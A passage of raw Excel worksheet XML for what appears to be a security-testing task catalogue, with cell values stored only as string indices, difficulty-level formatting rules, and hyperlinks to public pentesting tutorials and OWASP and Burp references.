      <c r="E79" s="1" t="s">
        <v>64</v>
      </c>
      <c r="F79" s="7" t="s">
        <v>21</v>
      </c>
      <c r="G79" s="1" t="s">
        <v>315</v>
      </c>
      <c r="H79" s="1" t="s">
        <v>311</v>
      </c>
      <c r="I79" s="1" t="s">
        <v>314</v>
      </c>
      <c r="J79" s="1"/>
      <c r="K79" s="1"/>
      <c r="L79" s="9"/>
      <c r="M79" s="1"/>
    </row>
    <row r="80" spans="1:13" ht="244.8" x14ac:dyDescent="0.3">
      <c r="A80" s="6">
        <v>79</v>
      </c>
      <c r="B80" s="1" t="s">
        <v>7</v>
      </c>
      <c r="C80" s="1" t="s">
        <v>8</v>
      </c>
      <c r="D80" s="1" t="s">
        <v>139</v>
      </c>
      <c r="E80" s="1" t="s">
        <v>59</v>
      </c>
      <c r="F80" s="7" t="s">
        <v>22</v>
      </c>
      <c r="G80" s="1" t="s">
        <v>441</v>
      </c>
      <c r="H80" s="1" t="s">
        <v>114</v>
      </c>
      <c r="I80" s="1" t="s">
        <v>348</v>
      </c>
      <c r="J80" s="1"/>
      <c r="K80" s="1"/>
      <c r="L80" s="9"/>
      <c r="M80" s="1"/>
    </row>
    <row r="81" spans="1:13" ht="288" x14ac:dyDescent="0.3">
      <c r="A81" s="6">
        <v>80</v>
      </c>
      <c r="B81" s="1" t="s">
        <v>450</v>
      </c>
      <c r="C81" s="1" t="s">
        <v>16</v>
      </c>
      <c r="D81" s="1" t="s">
        <v>89</v>
      </c>
      <c r="E81" s="1" t="s">
        <v>90</v>
      </c>
      <c r="F81" s="7" t="s">
        <v>23</v>
      </c>
      <c r="G81" s="1" t="s">
        <v>449</v>
      </c>
      <c r="H81" s="1"/>
      <c r="I81" s="1" t="s">
        <v>348</v>
      </c>
      <c r="J81" s="4" t="s">
        <v>447</v>
      </c>
      <c r="K81" s="1"/>
      <c r="L81" s="9"/>
      <c r="M81" s="1"/>
    </row>
    <row r="82" spans="1:13" ht="244.8" x14ac:dyDescent="0.3">
      <c r="A82" s="6">
        <v>81</v>
      </c>
      <c r="B82" s="1" t="s">
        <v>450</v>
      </c>
      <c r="C82" s="1" t="s">
        <v>16</v>
      </c>
      <c r="D82" s="1" t="s">
        <v>89</v>
      </c>
      <c r="E82" s="1" t="s">
        <v>64</v>
      </c>
      <c r="F82" s="7" t="s">
        <v>23</v>
      </c>
      <c r="G82" s="1" t="s">
        <v>453</v>
      </c>
      <c r="H82" s="1"/>
      <c r="I82" s="1" t="s">
        <v>452</v>
      </c>
      <c r="J82" s="4" t="s">
        <v>451</v>
      </c>
      <c r="K82" s="1"/>
      <c r="L82" s="9"/>
      <c r="M82" s="1"/>
    </row>
    <row r="83" spans="1:13" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A83" s="6">
        <v>82</v>
      </c>
      <c r="B83" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C83" s="1" t="s">
        <v>55</v>
      </c>
      <c r="D83" s="1" t="s">
        <v>170</v>
      </c>
      <c r="E83" s="1" t="s">
        <v>57</v>
      </c>
      <c r="F83" s="7" t="s">
        <v>23</v>
      </c>
      <c r="G83" s="1" t="s">
        <v>216</v>
      </c>
      <c r="H83" s="1" t="s">
        <v>114</v>
      </c>
      <c r="I83" s="1" t="s">
        <v>217</v>
      </c>
      <c r="J83" s="1" t="s">
        <v>219</v>
      </c>
      <c r="K83" s="1"/>
      <c r="L83" s="9"/>
      <c r="M83" s="1"/>
    </row>
    <row r="84" spans="1:13" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A84" s="6">
        <v>83</v>
      </c>
      <c r="B84" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C84" s="1" t="s">
        <v>8</v>
      </c>
      <c r="D84" s="1" t="s">
        <v>140</v>
      </c>
      <c r="E84" s="1" t="s">
        <v>58</v>
      </c>
      <c r="F84" s="7" t="s">
        <v>21</v>
      </c>
      <c r="G84" s="1" t="s">
        <v>218</v>
      </c>
      <c r="H84" s="1" t="s">
        <v>114</v>
      </c>
      <c r="I84" s="1" t="s">
        <v>114</v>
      </c>
      <c r="J84" s="1"/>
      <c r="K84" s="1"/>
      <c r="L84" s="9"/>
      <c r="M84" s="1"/>
    </row>
    <row r="85" spans="1:13" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A85" s="6">
        <v>84</v>
      </c>
      <c r="B85" s="1" t="s">
        <v>73</v>
      </c>
      <c r="C85" s="1" t="s">
        <v>45</v>
      </c>
      <c r="D85" s="1" t="s">
        <v>30</v>
      </c>
      <c r="E85" s="1" t="s">
        <v>232</v>
      </c>
      <c r="F85" s="7" t="s">
        <v>21</v>
      </c>
      <c r="G85" s="1" t="s">
        <v>442</v>
      </c>
      <c r="H85" s="1"/>
      <c r="I85" s="1" t="s">
        <v>395</v>
      </c>
      <c r="J85" s="4" t="s">
        <v>397</v>
      </c>
      <c r="K85" s="1"/>
      <c r="L85" s="9"/>
      <c r="M85" s="1"/>
    </row>
    <row r="86" spans="1:13" ht="230.4" x14ac:dyDescent="0.3">
      <c r="A86" s="6">
        <v>85</v>
      </c>
      <c r="B86" s="1" t="s">
        <v>73</v>
      </c>
      <c r="C86" s="1" t="s">
        <v>47</v>
      </c>
      <c r="D86" s="1" t="s">
        <v>171</v>
      </c>
      <c r="E86" s="1" t="s">
        <v>70</v>
      </c>
      <c r="F86" s="7" t="s">
        <v>21</v>
      </c>
      <c r="G86" s="1" t="s">
        <v>402</v>
      </c>
      <c r="H86" s="1"/>
      <c r="I86" s="1" t="s">
        <v>357</v>
      </c>
      <c r="J86" s="4" t="s">
        <v>401</v>
      </c>
      <c r="K86" s="1"/>
      <c r="L86" s="9"/>
      <c r="M86" s="1"/>
    </row>
    <row r="87" spans="1:13" ht="158.4" x14ac:dyDescent="0.3">
      <c r="A87" s="6">
        <v>86</v>
      </c>
      <c r="B87" s="1" t="s">
        <v>73</v>
      </c>
      <c r="C87" s="1" t="s">
        <v>71</v>
      </c>
      <c r="D87" s="1" t="s">
        <v>172</v>
      </c>
      <c r="E87" s="1" t="s">
        <v>72</v>
      </c>
      <c r="F87" s="7" t="s">
        <v>21</v>
      </c>
      <c r="G87" s="1" t="s">
        <v>403</v>
      </c>
      <c r="H87" s="1"/>
      <c r="I87" s="1" t="s">
        <v>357</v>
      </c>
      <c r="J87" s="4" t="s">
        <v>404</v>
      </c>
      <c r="K87" s="1"/>
      <c r="L87" s="9"/>
      <c r="M87" s="1"/>
    </row>
    <row r="88" spans="1:13" ht="187.2" x14ac:dyDescent="0.3">
      <c r="A88" s="6">
        <v>87</v>
      </c>
      <c r="B88" s="1" t="s">
        <v>73</v>
      </c>
      <c r="C88" s="1" t="s">
        <v>71</v>
      </c>
      <c r="D88" s="1" t="s">
        <v>407</v>
      </c>
      <c r="E88" s="1" t="s">
        <v>408</v>
      </c>
      <c r="F88" s="7" t="s">
        <v>21</v>
      </c>
      <c r="G88" s="1" t="s">
        <v>409</v>
      </c>
      <c r="H88" s="1"/>
      <c r="I88" s="1" t="s">
        <v>357</v>
      </c>
      <c r="J88" s="4" t="s">
        <v>410</v>
      </c>
      <c r="K88" s="1"/>
      <c r="L88" s="9"/>
      <c r="M88" s="1"/>
    </row>
    <row r="89" spans="1:13" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A89" s="6">
        <v>88</v>
      </c>
      <c r="B89" s="1" t="s">
        <v>73</v>
      </c>
      <c r="C89" s="1" t="s">
        <v>49</v>
      </c>
      <c r="D89" s="1" t="s">
        <v>61</v>
      </c>
      <c r="E89" s="1" t="s">
        <v>75</v>
      </c>
      <c r="F89" s="7" t="s">
        <v>21</v>
      </c>
      <c r="G89" s="1" t="s">
        <v>394</v>
      </c>
      <c r="H89" s="1"/>
      <c r="I89" s="1" t="s">
        <v>357</v>
      </c>
      <c r="J89" s="4" t="s">
        <v>393</v>
      </c>
      <c r="K89" s="1"/>
      <c r="L89" s="9"/>
      <c r="M89" s="1"/>
    </row>
    <row r="90" spans="1:13" ht="72" x14ac:dyDescent="0.3">
      <c r="A90" s="6">
        <v>89</v>
      </c>
      <c r="B90" s="1" t="s">
        <v>73</v>
      </c>
      <c r="C90" s="1" t="s">
        <v>49</v>
      </c>
      <c r="D90" s="1" t="s">
        <v>74</v>
      </c>
      <c r="E90" s="1" t="s">
        <v>76</v>
      </c>
      <c r="F90" s="7" t="s">
        <v>21</v>
      </c>
      <c r="G90" s="1" t="s">
        <v>418</v>
      </c>
      <c r="H90" s="1"/>
      <c r="I90" s="1"/>
      <c r="J90" s="4" t="s">
        <v>417</v>
      </c>
      <c r="K90" s="1"/>
      <c r="L90" s="9"/>
      <c r="M90" s="1"/>
    </row>
    <row r="91" spans="1:13" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A91" s="6">
        <v>90</v>
      </c>
      <c r="B91" s="1" t="s">
        <v>73</v>
      </c>
      <c r="C91" s="1" t="s">
        <v>83</v>
      </c>
      <c r="D91" s="1" t="s">
        <v>175</v>
      </c>
      <c r="E91" s="1" t="s">
        <v>200</v>
      </c>
      <c r="F91" s="7" t="s">
        <v>21</v>
      </c>
      <c r="G91" s="1" t="s">
        <v>406</v>
      </c>
      <c r="H91" s="1"/>
      <c r="I91" s="1" t="s">
        <v>357</v>
      </c>
      <c r="J91" s="4" t="s">
        <v>405</v>
      </c>
      <c r="K91" s="1"/>
      <c r="L91" s="9"/>
      <c r="M91" s="1"/>
    </row>
    <row r="92" spans="1:13" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A92" s="6">
        <v>91</v>
      </c>
      <c r="B92" s="1" t="s">
        <v>73</v>
      </c>
      <c r="C92" s="1" t="s">
        <v>101</v>
      </c>
      <c r="D92" s="1" t="s">
        <v>173</v>
      </c>
      <c r="E92" s="1" t="s">
        <v>102</v>
      </c>
      <c r="F92" s="7" t="s">
        <v>21</v>
      </c>
      <c r="G92" s="1" t="s">
        <v>398</v>
      </c>
      <c r="H92" s="1"/>
      <c r="I92" s="1" t="s">
        <v>396</v>
      </c>
      <c r="J92" s="1"/>
      <c r="K92" s="1"/>
      <c r="L92" s="9"/>
      <c r="M92" s="1"/>
    </row>
    <row r="93" spans="1:13" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A93" s="6">
        <v>92</v>
      </c>
      <c r="B93" s="1" t="s">
        <v>73</v>
      </c>
      <c r="C93" s="1" t="s">
        <v>101</v>
      </c>
      <c r="D93" s="1" t="s">
        <v>174</v>
      </c>
      <c r="E93" s="1" t="s">
        <v>103</v>
      </c>
      <c r="F93" s="7" t="s">
        <v>21</v>
      </c>
      <c r="G93" s="1" t="s">
        <v>416</v>
      </c>
      <c r="H93" s="1"/>
      <c r="I93" s="1" t="s">
        <v>415</v>
      </c>
      <c r="J93" s="1" t="s">
        <v>414</v>
      </c>
      <c r="K93" s="1"/>
      <c r="L93" s="9"/>
      <c r="M93" s="1"/>
    </row>
    <row r="94" spans="1:13" ht="144" x14ac:dyDescent="0.3">
      <c r="A94" s="6">
        <v>93</v>
      </c>
      <c r="B94" s="1" t="s">
        <v>73</v>
      </c>
      <c r="C94" s="1" t="s">
        <v>71</v>
      </c>
      <c r="D94" s="1" t="s">
        <v>104</v>
      </c>
      <c r="E94" s="1" t="s">
        <v>105</v>
      </c>
      <c r="F94" s="7" t="s">
        <v>21</v>
      </c>
      <c r="G94" s="1" t="s">
        <v>399</v>
      </c>
      <c r="H94" s="1"/>
      <c r="I94" s="1" t="s">
        <v>357</v>
      </c>
      <c r="J94" s="4" t="s">
        <v>400</v>
      </c>
      <c r="K94" s="1"/>
      <c r="L94" s="9"/>
      <c r="M94" s="1"/>
    </row>
    <row r="95" spans="1:13" ht="144" x14ac:dyDescent="0.3">
      <c r="A95" s="6">
        <v>94</v>
      </c>
      <c r="B95" s="1" t="s">
        <v>73</v>
      </c>
      <c r="C95" s="1" t="s">
        <v>107</v>
      </c>
      <c r="D95" s="1" t="s">
        <v>178</v>
      </c>
      <c r="E95" s="1" t="s">
        <v>108</v>
      </c>
      <c r="F95" s="7" t="s">
        <v>21</v>
      </c>
      <c r="G95" s="1" t="s">
        <v>421</v>
      </c>
      <c r="H95" s="1"/>
      <c r="I95" s="1" t="s">
        <v>419</v>
      </c>
      <c r="J95" s="4" t="s">
        <v>420</v>
      </c>
      <c r="K95" s="1"/>
      <c r="L95" s="9"/>
      <c r="M95" s="1"/>
    </row>
    <row r="96" spans="1:13" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A96" s="6">
        <v>95</v>
      </c>
      <c r="B96" s="1" t="s">
        <v>73</v>
      </c>
      <c r="C96" s="1" t="s">
        <v>107</v>
      </c>
      <c r="D96" s="1" t="s">
        <v>178</v>
      </c>
      <c r="E96" s="1" t="s">
        <v>422</v>
      </c>
      <c r="F96" s="7" t="s">
        <v>21</v>
      </c>
      <c r="G96" s="1" t="s">
        <v>423</v>
      </c>
      <c r="H96" s="1"/>
      <c r="I96" s="1" t="s">
        <v>424</v>
      </c>
      <c r="J96" s="4" t="s">
        <v>425</v>
      </c>
      <c r="K96" s="1"/>
      <c r="L96" s="9"/>
      <c r="M96" s="1"/>
    </row>
    <row r="97" spans="1:13" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A97" s="6">
        <v>96</v>
      </c>
      <c r="B97" s="1" t="s">
        <v>97</v>
      </c>
      <c r="C97" s="1" t="s">
        <v>98</v>
      </c>
      <c r="D97" s="1" t="s">
        <v>99</v>
      </c>
      <c r="E97" s="1" t="s">
        <v>100</v>
      </c>
      <c r="F97" s="7" t="s">
        <v>21</v>
      </c>
      <c r="G97" s="1" t="s">
        <v>412</v>
      </c>
      <c r="H97" s="1"/>
      <c r="I97" s="1" t="s">
        <v>411</v>
      </c>
      <c r="J97" s="4" t="s">
        <v>413</v>
      </c>
      <c r="K97" s="1"/>
      <c r="L97" s="9"/>
      <c r="M97" s="1"/>
    </row>
    <row r="98" spans="1:13" ht="144" x14ac:dyDescent="0.3">
      <c r="A98" s="6">
        <v>97</v>
      </c>
      <c r="B98" s="1" t="s">
        <v>106</v>
      </c>
      <c r="C98" s="1" t="s">
        <v>45</v>
      </c>
      <c r="D98" s="1" t="s">
        <v>30</v>
      </c>
      <c r="E98" s="1" t="s">
        <v>232</v>
      </c>
      <c r="F98" s="7" t="s">
        <v>21</v>
      </c>
      <c r="G98" s="1" t="s">
        <v>355</v>
      </c>
      <c r="H98" s="1" t="s">
        <v>114</v>
      </c>
      <c r="I98" s="1" t="s">
        <v>276</v>
      </c>
      <c r="J98" s="1"/>
      <c r="K98" s="1"/>
      <c r="L98" s="9"/>
      <c r="M98" s="1"/>
    </row>
    <row r="99" spans="1:13" ht="172.8" x14ac:dyDescent="0.3">
      <c r="A99" s="6">
        <v>98</v>
      </c>
      <c r="B99" s="1" t="s">
        <v>106</v>
      </c>
      <c r="C99" s="1" t="s">
        <v>45</v>
      </c>
      <c r="D99" s="1" t="s">
        <v>110</v>
      </c>
      <c r="E99" s="1" t="s">
        <v>109</v>
      </c>
      <c r="F99" s="7" t="s">
        <v>22</v>
      </c>
      <c r="G99" s="1" t="s">
        <v>356</v>
      </c>
      <c r="H99" s="1" t="s">
        <v>114</v>
      </c>
      <c r="I99" s="1" t="s">
        <v>328</v>
      </c>
      <c r="J99" s="4" t="s">
        <v>330</v>
      </c>
      <c r="K99" s="1"/>
      <c r="L99" s="9"/>
      <c r="M99" s="1"/>
    </row>
    <row r="100" spans="1:13" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A100" s="6">
        <v>99</v>
      </c>
      <c r="B100" s="1" t="s">
        <v>106</v>
      </c>
      <c r="C100" s="1" t="s">
        <v>107</v>
      </c>
      <c r="D100" s="1" t="s">
        <v>178</v>
      </c>
      <c r="E100" s="1" t="s">
        <v>108</v>
      </c>
      <c r="F100" s="7" t="s">
        <v>21</v>
      </c>
      <c r="G100" s="1" t="s">
        <v>358</v>
      </c>
      <c r="H100" s="1" t="s">
        <v>114</v>
      </c>
      <c r="I100" s="1" t="s">
        <v>357</v>
      </c>
      <c r="J100" s="4" t="s">
        <v>359</v>
      </c>
      <c r="K100" s="1"/>
      <c r="L100" s="9"/>
      <c r="M100" s="1"/>
    </row>
    <row r="101" spans="1:13" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A101" s="6">
        <v>100</v>
      </c>
      <c r="B101" s="1" t="s">
        <v>53</v>
      </c>
      <c r="C101" s="1" t="s">
        <v>48</v>
      </c>
      <c r="D101" s="1" t="s">
        <v>176</v>
      </c>
      <c r="E101" s="1" t="s">
        <v>54</v>
      </c>
      <c r="F101" s="7" t="s">
        <v>21</v>
      </c>
      <c r="G101" s="1" t="s">
        <v>360</v>
      </c>
      <c r="H101" s="1" t="s">
        <v>114</v>
      </c>
      <c r="I101" s="1" t="s">
        <v>361</v>
      </c>
      <c r="J101" s="1"/>
      <c r="K101" s="1"/>
      <c r="L101" s="9"/>
      <c r="M101" s="1"/>
    </row>
    <row r="102" spans="1:13" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A102" s="6">
        <v>101</v>
      </c>
      <c r="B102" s="1" t="s">
        <v>53</v>
      </c>
      <c r="C102" s="2" t="s">
        <v>60</v>
      </c>
      <c r="D102" s="2" t="s">
        <v>61</v>
      </c>
      <c r="E102" s="2" t="s">
        <v>365</v>
      </c>
      <c r="F102" s="7" t="s">
        <v>22</v>
      </c>
      <c r="G102" s="1" t="s">
        <v>362</v>
      </c>
      <c r="H102" s="1" t="s">
        <v>114</v>
      </c>
      <c r="I102" s="1" t="s">
        <v>363</v>
      </c>
      <c r="J102" s="4" t="s">
        <v>364</v>
      </c>
      <c r="K102" s="1"/>
      <c r="L102" s="9"/>
      <c r="M102" s="1"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="F2:F9 F89:F95 F97:F1048576 F40:F81 F11:F26 F28:F38 F83:F87">
    <cfRule type="containsText" dxfId="20" priority="19" operator="containsText" text="Difficult">
      <formula>NOT(ISERROR(SEARCH("Difficult",F2)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="19" priority="20" operator="containsText" text="Moderate">
      <formula>NOT(ISERROR(SEARCH("Moderate",F2)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="18" priority="21" operator="containsText" text="Easy">
      <formula>NOT(ISERROR(SEARCH("Easy",F2)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F88">
    <cfRule type="containsText" dxfId="17" priority="16" operator="containsText" text="Difficult">
      <formula>NOT(ISERROR(SEARCH("Difficult",F88)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="16" priority="17" operator="containsText" text="Moderate">
      <formula>NOT(ISERROR(SEARCH("Moderate",F88)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="15" priority="18" operator="containsText" text="Easy">
      <formula>NOT(ISERROR(SEARCH("Easy",F88)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F96">
    <cfRule type="containsText" dxfId="14" priority="13" operator="containsText" text="Difficult">
      <formula>NOT(ISERROR(SEARCH("Difficult",F96)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="13" priority="14" operator="containsText" text="Moderate">
      <formula>NOT(ISERROR(SEARCH("Moderate",F96)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="12" priority="15" operator="containsText" text="Easy">
      <formula>NOT(ISERROR(SEARCH("Easy",F96)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F39">
    <cfRule type="containsText" dxfId="11" priority="10" operator="containsText" text="Difficult">
      <formula>NOT(ISERROR(SEARCH("Difficult",F39)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="10" priority="11" operator="containsText" text="Moderate">
      <formula>NOT(ISERROR(SEARCH("Moderate",F39)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="9" priority="12" operator="containsText" text="Easy">
      <formula>NOT(ISERROR(SEARCH("Easy",F39)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F10">
    <cfRule type="containsText" dxfId="8" priority="7" operator="containsText" text="Difficult">
      <formula>NOT(ISERROR(SEARCH("Difficult",F10)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="7" priority="8" operator="containsText" text="Moderate">
      <formula>NOT(ISERROR(SEARCH("Moderate",F10)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="6" priority="9" operator="containsText" text="Easy">
      <formula>NOT(ISERROR(SEARCH("Easy",F10)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F27">
    <cfRule type="containsText" dxfId="5" priority="4" operator="containsText" text="Difficult">
      <formula>NOT(ISERROR(SEARCH("Difficult",F27)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="4" priority="5" operator="containsText" text="Moderate">
      <formula>NOT(ISERROR(SEARCH("Moderate",F27)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="3" priority="6" operator="containsText" text="Easy">
      <formula>NOT(ISERROR(SEARCH("Easy",F27)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F82">
    <cfRule type="containsText" dxfId="2" priority="1" operator="containsText" text="Difficult">
      <formula>NOT(ISERROR(SEARCH("Difficult",F82)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="2" operator="containsText" text="Moderate">
      <formula>NOT(ISERROR(SEARCH("Moderate",F82)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="0" priority="3" operator="containsText" text="Easy">
      <formula>NOT(ISERROR(SEARCH("Easy",F82)))</formula>
    </cfRule>
  </conditionalFormatting>
  <hyperlinks>
    <hyperlink ref="J49" r:id="rId1" xr:uid="{7EAAC9E5-2117-42D5-8DEF-E118E6B5BB74}"/>
    <hyperlink ref="J55" r:id="rId2" display="https://www.whitelist1.com/2017/05/10-buffer-overflow-exploitation-on-mips.html" xr:uid="{CE9BF74A-D4E9-406B-99D9-69A99458E77F}"/>
    <hyperlink ref="J47" r:id="rId3" xr:uid="{6BF75BFA-ADF1-4281-98FB-6C9CC8A57B9A}"/>
    <hyperlink ref="J69" r:id="rId4" display="https://www.security-sleuth.com/sleuth-blog/2015/9/6/now-i-wanna-sniff-some-bluetooth-sniffing-and-cracking-bluetooth-with-the-ubertoothone" xr:uid="{85FFCFF9-ED0D-4DC1-B7DC-CCF7820C03D6}"/>
    <hyperlink ref="J70" r:id="rId5" xr:uid="{ABB3A978-5AD4-4E3B-8C84-7D7CFAB041F8}"/>
    <hyperlink ref="J81" r:id="rId6" display="https://pentestmag.com/ettercap-tutorial-for-windows/" xr:uid="{A8FAE062-41AF-4DA4-ACDF-AA21BA994DE6}"/>
    <hyperlink ref="J99" r:id="rId7" display="https://www.whitelist1.com/2017/05/10-buffer-overflow-exploitation-on-mips.html" xr:uid="{6D49445C-5DB9-49AE-B119-894E93881C21}"/>
    <hyperlink ref="J100" r:id="rId8" display="https://www.owasp.org/index.php/OWASP_API_Security_Project" xr:uid="{D2C5097D-7C69-4520-BEE7-63FAEA786B9F}"/>
    <hyperlink ref="J102" r:id="rId9" display="https://www.tunnelsup.com/getting-started-cracking-password-hashes/" xr:uid="{54537455-032A-4889-AD11-C31B14A7E99E}"/>
    <hyperlink ref="J48" r:id="rId10" display="https://forum.exploitee.rs/viewtopic.php?t=1642" xr:uid="{BF5561E4-5B60-4706-8B1A-E498163FEA0C}"/>
    <hyperlink ref="J64" r:id="rId11" display="https://medium.com/@shreyasubale/reverse-engineering-a-wireless-doorbell-and-performing-a-replay-attack-part1-23d59d57ce82" xr:uid="{C80F7AA3-0D32-4ACB-A5A4-829BA71979EA}"/>
    <hyperlink ref="J65" r:id="rId12" xr:uid="{35595361-FC43-442E-A8A5-693AC28154E2}"/>
    <hyperlink ref="J62" r:id="rId13" display="https://ferrancasanovas.wordpress.com/cracking-and-sniffing-gsm-with-rtl-sdr-concept/" xr:uid="{417CA3A4-637C-430B-A048-1B9530DCFB8F}"/>
    <hyperlink ref="J89" r:id="rId14" xr:uid="{02BD5381-8A1E-44B2-85CE-E56A4A76FC99}"/>
    <hyperlink ref="J85" r:id="rId15" display="https://stackoverflow.com/questions/12732882/reverse-engineering-from-an-apk-file-to-a-project" xr:uid="{BBF177FB-6EA9-4520-8ED7-A165CC348AE1}"/>
    <hyperlink ref="J94" r:id="rId16" display="https://portswigger.net/burp/documentation/desktop/tools/repeater/using" xr:uid="{8BC49318-A301-4B4B-82A3-E554404F843F}"/>
    <hyperlink ref="J86" r:id="rId17" display="https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)_x000a_" xr:uid="{797548B0-86BC-483E-A7F2-6D9E8AC920B2}"/>
    <hyperlink ref="J87" r:id="rId18" xr:uid="{06171F4A-F4B0-405A-B52D-872AEA1FAB6D}"/>
    <hyperlink ref="J91" r:id="rId19" display="https://www.owasp.org/images/4/42/OWASP_Web_Application_Security_Quick_Reference_Guide_0.2.pdf" xr:uid="{25DD0344-5A92-44DA-98A0-0B93151ACB2D}"/>
    <hyperlink ref="J88" r:id="rId20" display="https://support.portswigger.net/customer/en/portal/articles/2590642-using-burp-to-test-for-code-injection-vulnerabilities" xr:uid="{7E5DD813-8BA8-4F5D-8D03-3C7B7C7CF00B}"/>
    <hyperlink ref="J97" r:id="rId21" display="https://developer.android.com/studio/command-line/logcat" xr:uid="{881AA5DF-A11B-4115-A6CB-8DD100CA293C}"/>
    <hyperlink ref="J90" r:id="rId22" xr:uid="{494B3484-A5D5-4B96-85CF-DF155272210A}"/>
    <hyperlink ref="J95" r:id="rId23" xr:uid="{25E50CC8-B8A2-48FD-8E40-D1EBD35CA698}"/>
    <hyperlink ref="J96" r:id="rId24" display="https://www.qasymphony.com/blog/automated-api-testing-tutorial/" xr:uid="{2932570D-BF78-41E4-A70D-A3AB5CBD0EB1}"/>
    <hyperlink ref="J39" r:id="rId25" xr:uid="{9A05A1B7-277B-46AC-9E0F-9AC1346FDF5F}"/>
    <hyperlink ref="J10" r:id="rId26" display="https://www.cs.bham.ac.uk/~tpc/Papers/CARDIS18.pdf" xr:uid="{CA8D5198-9DC1-4AE9-9AF4-8C6D51F6D6CA}"/>
    <hyperlink ref="J27" r:id="rId27" display="https://www.cs.bham.ac.uk/~tpc/Papers/CARDIS18.pdf" xr:uid="{15FD281C-FDEF-41A5-A159-72C1954545C5}"/>
    <hyperlink ref="J74" r:id="rId28" xr:uid="{71A336B7-0901-400A-A545-065AF2B3064C}"/>
    <hyperlink ref="J82" r:id="rId29" display="https://pentestmag.com/ettercap-tutorial-for-windows/" xr:uid="{50676EF3-7D91-44B5-806F-CB7482BBEC85}"/>
  </hyperlinks>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" horizontalDpi="300" verticalDpi="0"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E18E0-5524-4BD1-80B1-520CF741C7F6}">
  <dimension ref="A1:D32"/>
  <sheetViews>
    <sheetView workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="2" max="2" width="21.77734375" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="98.33203125" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="28.109375" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4" x14ac:dyDescent="0.3">
      <c r="A1" s="18" t="s">
        <v>5</v>
      </c>
      <c r="B1" s="18" t="s">
        <v>454</v>
      </c>
      <c r="C1" s="18" t="s">
        <v>455</v>
      </c>
      <c r="D1" s="18" t="s">
        <v>456</v>
      </c>
    </row>
    <row r="2" spans="1:4" x14ac:dyDescent="0.3">
      <c r="A2" s="33" t="s">
        <v>457</v>
      </c>
      <c r="B2" s="33"/>
      <c r="C2" s="33"/>
      <c r="D2" s="33"/>
    </row>
    <row r="3" spans="1:4" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A3" s="19" t="s">
        <v>458</v>
      </c>
      <c r="B3" s="17" t="s">
        <v>459</v>
      </c>
      <c r="C3" s="20" t="s">
        <v>460</v>
      </c>
      <c r="D3" s="20" t="s">
        <v>461</v>
      </c>
    </row>
    <row r="4" spans="1:4" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A4" s="19" t="s">
        <v>462</v>
      </c>
      <c r="B4" s="17" t="s">
        <v>463</v>
      </c>
      <c r="C4" s="20" t="s">
        <v>464</v>
      </c>
      <c r="D4" s="20" t="s">
        <v>461</v>
      </c>
    </row>
    <row r="5" spans="1:4" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A5" s="19" t="s">
        <v>465</v>
      </c>
      <c r="B5" s="17" t="s">
        <v>466</v>
      </c>
      <c r="C5" s="20" t="s">
        <v>467</v>
      </c>
      <c r="D5" s="20" t="s">
        <v>468</v>
      </c>
    </row>
    <row r="6" spans="1:4" x14ac:dyDescent="0.3">
      <c r="A6" s="30"/>
      <c r="B6" s="31"/>
      <c r="C6" s="31"/>
      <c r="D6" s="32"/>
    </row>
    <row r="7" spans="1:4" x14ac:dyDescent="0.3">
      <c r="A7" s="15" t="s">
        <v>7</v>
      </c>
      <c r="B7" s="14"/>
      <c r="C7" s="14"/>
      <c r="D7" s="29"/>
    </row>
    <row r="8" spans="1:4" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A8" s="19" t="s">
        <v>458</v>
      </c>
      <c r="B8" s="17" t="s">
        <v>469</v>
      </c>
      <c r="C8" s="20" t="s">
        <v>470</v>
      </c>
      <c r="D8" s="20" t="s">
        <v>471</v>
      </c>
    </row>
    <row r="9" spans="1:4" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A9" s="19" t="s">
        <v>462</v>
      </c>
      <c r="B9" s="17" t="s">
